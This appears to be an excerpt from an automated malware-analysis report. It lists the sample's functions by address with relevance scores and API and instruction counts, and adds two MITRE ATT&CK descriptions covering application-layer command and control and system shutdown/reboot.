Function 00406864 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 00405A38 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Function 00406026 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Function 00405EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
stringCOMMON

Function 00407033 Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Function 00407234 Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Function 00406F4A Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Function 00406A4F Relevance: 5.2, APIs: 4, Instructions: 198
COMMON

Function 00406E9D Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Function 00406FBB Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Function 00406F07 Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Function 00405BCB Relevance: 4.5, APIs: 3, Instructions: 28
fileCOMMON

Function 0040697F Relevance: 4.5, APIs: 3, Instructions: 27
synchronizationCOMMON

Function 004015C1 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Function 00405AEA Relevance: 3.0, APIs: 2, Instructions: 24
processCOMMON

Function 004068D4 Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Function 00405FF7 Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Function 00405FD2 Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre